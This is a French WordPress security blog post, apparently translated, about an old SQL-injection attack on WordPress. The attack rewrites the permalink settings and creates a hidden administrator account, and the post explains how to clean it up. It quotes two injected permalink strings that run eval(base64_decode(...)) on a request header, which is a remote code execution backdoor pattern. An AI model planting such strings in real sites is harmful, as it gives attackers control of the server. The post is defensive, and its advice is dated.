WPBeginner - Tutoriels WordPress pour débutants

Tutoriels WordPress de confiance, quand vous en avez le plus besoin.
Guide du débutant pour WordPress
WPB Cup
25 millions+
Sites web utilisant nos plugins
16+
Années d'expérience WordPress
3000+
Tutoriels WordPress par des experts

Injection SQL WordPress – Dernière attaque

Par Editorial Staff | | Divulgation du lecteur

Shares 2 ChatGPT Perplexity X LinkedIn WhatsApp

De nombreux sites sont touchés par une récente attaque SQL où des codes sont injectés sur votre site. Cette injection MySQL affecte vos permaliens en les rendant inefficaces. Par conséquent, les URL de vos articles de blog ne fonctionneront pas. De nombreux blogs WordPress ont été ciblés lors de cette attaque. Merci à Andy Soward de nous avoir signalé cela.

L'un des codes suivants a été ajouté à votre structure de permaliens en raison de cette attaque :

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Ces guillemets ont été ajoutés à tous les permaliens de votre site et ne peuvent être modifiés que s'ils sont supprimés manuellement.

Pour résoudre ce problème, allez à :

Paramètres > Permaliens et supprimez le code ci-dessus et remplacez votre code par défaut.

La prochaine chose à faire est d'aller dans Utilisateurs. Vous verrez qu'il y a plus d'un administrateur. Vous ne verrez pas leur nom listé, mais vous verrez le nombre augmenter. Vous devez donc examiner tous les utilisateurs et trouver le dernier qui s'est enregistré. Passez votre souris sur cet utilisateur et obtenez le lien. Modifiez le code userid= en ajoutant 1 à ce nombre. Donc, si le dernier utilisateur que vous pouvez voir était l'utilisateur n° 2, ajoutez 1 et faites-en 3. Vous devriez trouver que l'administrateur caché a un code étrange comme prénom. Supprimez le code et faites-en un abonné. Revenez ensuite et supprimez-le.

Cela devrait résoudre le problème. Vous pouvez également le supprimer simplement en allant dans votre PHPMyAdmin. Parce que vous verrez l'utilisateur là-bas.

Nous voulions simplement diffuser cette nouvelle dès que possible, afin que nos utilisateurs puissent être informés. Veuillez vous assurer que votre blog n'est pas infecté. Nous espérons que WordPress publiera bientôt une mise à jour.

De plus, si vous n'avez pas mis en œuvre certaines de ces mesures pour sécuriser votre zone d'administration WordPress.

Populaire sur WPBeginner En ce moment !

Avis : Notre contenu est financé par nos lecteurs. Cela signifie que si vous cliquez sur certains de nos liens, nous pouvons percevoir une commission. Voir comment WPBeginner est financé, pourquoi c'est important et comment vous pouvez nous soutenir. Voici notre processus éditorial.

La boîte à outils WordPress ultime

Accédez GRATUITEMENT à notre boîte à outils - une collection de produits et de ressources liés à WordPress que tout professionnel devrait posséder !

Télécharger maintenant

Interactions des lecteurs

8 CommentsLeave a Reply

  1. La base de données de mon site web a été injectée il y a quelques jours, ajoutant des caractères et des mots étranges après chaque URL de publication ou de page. Je n'ai rien trouvé d'étrange dans les paramètres : permaliens ou dans le menu des utilisateurs. Que faire pour résoudre ce problème, s'il vous plaît ? Mon hébergeur a une sauvegarde de la base de données infectée également !

    Reply

  2. j'ai été touché par ça deux fois.

    la première fois, c'était une injection SQL du plugin wassup, cette fois je ne suis pas sûr. mon fournisseur d'hébergement m'a bloqué.

    une fois qu'ils auront restauré mon compte, je supprimerai WordPress... J'en ai assez !

    Reply

    • Qu'avez-vous découvert à ce sujet ? J'ai été touché par le même problème. Tous mes sites WP sur mon compte souffrent du même problème.

      Reply

    • Nous apprécions vraiment ce commentaire, le problème ne venait pas de WP Super Cache, nous pensons que c'était le plugin appelé WP External Link. Nous avons désinstallé et réinstallé WP-Super Cache deux fois, puis nous avons comparé le serveur de développement où tout fonctionnait bien. La différence était ce plugin. Lorsque nous avons supprimé ce plugin, cela a fonctionné. Vous pouvez maintenant lire cet article.

      Reply

      Admin

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, je lis !
        Merci beaucoup !

        Reply

Laisser un commentaire

Merci d'avoir choisi de laisser un commentaire. N'oubliez pas que tous les commentaires sont modérés conformément à notre politique de commentaires, et votre adresse e-mail ne sera PAS publiée. Veuillez NE PAS utiliser de mots-clés dans le champ du nom. Ayons une conversation personnelle et significative.

Copyright © 2009 - 2025 WPBeginner LLC. Tous droits réservés. WPBeginner® est une marque déposée.

Géré par Awesome Motive | Hébergement WordPress par SiteGround

La marque WordPress® est la propriété intellectuelle de la WordPress Foundation. L'utilisation des noms WordPress® sur ce site web est uniquement à des fins d'identification et n'implique aucune approbation par la WordPress Foundation. WPBeginner n'est pas approuvé, possédé ou affilié à la WordPress Foundation.

J'ai besoin d'aide avec…

Recherches populaires :

Lancer un blog SEO WordPress Performance WordPress Erreurs WordPress Sécurité WordPress Créer une boutique en ligne